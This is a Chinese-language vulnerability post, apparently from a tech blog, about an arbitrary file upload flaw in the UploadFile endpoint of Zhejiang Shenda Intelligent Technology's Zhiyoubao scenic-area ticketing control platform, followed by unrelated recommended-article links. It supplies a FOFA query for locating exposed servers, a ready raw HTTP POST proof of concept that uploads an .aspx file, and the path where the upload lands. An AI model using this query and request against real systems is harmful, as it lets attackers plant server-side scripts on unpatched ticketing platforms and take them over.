浙江深大智能科技有限公司管控平台服务端存在任意文件上传漏洞

漏洞描述

智游宝是连接景区与分销商(OTA、旅行社)的公正、权威、可信的第三方服务平台。作为国内智慧景区第三方技术服务支撑平台,智游宝为景区提供了可控制分销商的管理环境,安全、便捷、高效地实现了电子票的生产、发送、检票、退换票以及票款回收等技术环节;为分销商提供了便捷的采购和发货渠道;为景区提供了一系列数据分析报告,辅助景区决策。浙江深大智能科技有限公司管控平台服务端UploadFile存在任意文件上传漏洞。

漏洞复现

FOFA

复制代码
body="ItemsControlServer.aspx"

POC

复制代码
POST /Launch/UploadFile?FileName=toto.aspx&Version=1&Size=100 HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1

2

上传后文件路径

复制代码
/Launch/Client/toto.aspx
相关推荐
jsws_lisa5 小时前
聚焦“新智造”,驱动未来——2025广州国际汽车零部件及加工技术与汽车模具展圆满落幕
科技·汽车·制造·可用性测试
wanhengidc6 小时前
云手机 多样化的云服务产品
运维·服务器·科技·游戏·智能手机
xfchsjh6 小时前
2025新时代想选优质数字科技企业展厅设计公司哪家好?深圳“潜力股”不容错过!
人工智能·科技·设计·艺术·展厅设计·展馆设计·科技展厅设计
非凸科技6 小时前
第50届ICPC亚洲区域赛·上海站,非凸科技持续护航编程新力量
科技
MicroTech20257 小时前
微算法科技(NASDAQ:MLGO)优化区块链身份证明(PoI)技术:构建可信网络的基石
网络·科技·区块链
std78797 小时前
18光年外的超级地球,移民过去能否正常生活
科技
Metathe7 小时前
科技金融的未来 “王者”—— 电子金融
科技·金融·经济学·电子金融
望安认证7 小时前
望安科技赞助并出席 2025 CCF 中国软件大会,共话形式化验证与原生安全最新发展
大数据·科技·安全·形式化验证·原生安全
TRSsd7 小时前
如何将视频快速转为二维码?用于介绍科技发明?
经验分享·科技
伊克罗德信息科技7 小时前
伊克罗德信息蝉联2025亚马逊云科技中国区年度创新合作伙伴奖,以AI深耕云端未来
人工智能·科技